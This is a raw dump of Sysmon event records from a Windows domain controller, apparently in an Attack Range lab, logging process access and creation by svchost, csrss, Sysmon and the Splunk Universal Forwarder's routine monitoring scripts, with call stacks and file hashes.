13:12:09.723{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004092Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.723{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004091Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.723{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004090Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.723{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004089Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.723{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004088Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.723{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004087Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.723{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004086Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.723{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004085Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.723{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4329-6000-DF00-000000009A01}4212C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004084Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.723{08A6967A-4325-6000-B900-000000009A01}11763032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4329-6000-DF00-000000009A01}4212C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004083Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.724{08A6967A-4329-6000-DF00-000000009A01}4212C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinNetMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004082Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.613{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4329-6000-DE00-000000009A01}4120C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004081Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.613{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004080Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.613{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004079Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.613{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004078Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.613{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004077Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.613{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004076Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.613{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004075Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.613{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004074Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.613{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004073Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.613{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004072Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.613{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4329-6000-DE00-000000009A01}4120C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004071Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.613{08A6967A-4325-6000-B900-000000009A01}11763032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4329-6000-DE00-000000009A01}4120C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004070Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.616{08A6967A-4329-6000-DE00-000000009A01}4120C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinHostMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004069Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.503{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4329-6000-DD00-000000009A01}4880C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004068Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.503{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004067Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 